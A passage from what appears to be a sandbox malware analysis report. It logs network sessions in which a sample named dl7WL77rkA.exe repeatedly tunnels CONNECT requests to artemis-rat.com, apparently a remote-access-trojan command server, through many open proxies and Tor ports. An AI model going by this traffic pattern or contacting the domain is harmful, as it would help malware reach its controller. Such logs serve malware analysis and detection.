                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.193416119 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            941192.168.2.55243095.140.124.16110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.415015936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            942192.168.2.552433171.235.166.22240193876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.415360928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.762739897 CET228INHTTP/1.0 502 Bad Gateway
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
943192.168.2.55255746.51.249.13531283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:41.415596008 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.680811882 CET  116  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
944192.168.2.55241245.4.144.23241533876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:41.416321039 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
945192.168.2.55194059.15.28.7631283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:41.427187920 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.592360973 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.007117987 CET  39  IN  HTTP/1.1 200 Connection established


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
946192.168.2.552499223.19.111.185803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:41.429307938 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.092617989 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.093195915 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.092799902 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.889781952 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.702406883 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.499022961 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:04.093004942 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:17.853588104 CET  340  IN  HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>
Mar 11, 2024 03:31:41.893565893 CET  340  IN  HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
947192.168.2.552408103.231.78.36803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:41.432776928 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.820370913 CET  309  IN  HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:13:34 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
948192.168.2.55202037.187.73.7125823876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:41.433908939 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.446055889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.572568893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.717600107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            949192.168.2.552533194.145.209.18731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.446857929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:40.786636114 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:43.788589001 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:49.795939922 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:01.810477972 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:25.875163078 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            950192.168.2.552409103.190.54.14180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.460732937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            951192.168.2.55255547.243.92.19931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.460813046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.770385027 CET38INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            content-length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            952192.168.2.552583184.72.36.89803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.460952997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.633858919 CET344INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 199
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            953192.168.2.552562185.103.101.39100513876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.460954905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:04.979985952 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:06.545281887 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:08.407903910 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:12.241776943 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>
Mar 11, 2024 03:31:19.665225029 CET | 729 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>
Mar 11, 2024 03:31:34.513364077 CET | 729 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>
Mar 11, 2024 03:32:04.209476948 CET | 729 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            954192.168.2.552440202.74.48.6610883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.461038113 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            955192.168.2.552604185.162.229.215803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.461218119 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.615920067 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            956192.168.2.552632172.67.242.194803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.504750013 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.659790993 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            957192.168.2.552642104.21.218.103803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.516730070 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.676661968 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            958192.168.2.552637104.25.135.170803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.518582106 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.676651001 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            959192.168.2.55258838.162.16.5231283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.526858091 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.946166992 CET | 111 | IN | HTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
